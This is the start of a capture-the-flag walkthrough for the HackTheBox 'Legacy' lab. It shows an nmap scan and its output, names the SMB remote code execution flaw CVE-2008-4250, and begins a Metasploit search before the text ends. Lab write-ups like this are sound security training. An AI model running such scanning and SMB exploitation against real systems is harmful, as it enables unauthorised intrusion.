Welcome to Legacy, the first Windows box on HackTheBox Labs. We'll get started with the IP address, 10.10.10.4
.
We'll employ the nmap
scanning tool:
$ sudo nmap 10.10.10.4
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 19:46 CEST
Nmap scan report for 10.10.10.4
Host is up (0.032s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
We can see that there are 3 ports open. These ports all relate to the SMB (Server Message Block) protocol. Searching around we can find a CVE for SMB with remote code execution from 2008: CVE-2008-4250
. Let's exploit it:
msf6 > search SMB 2008
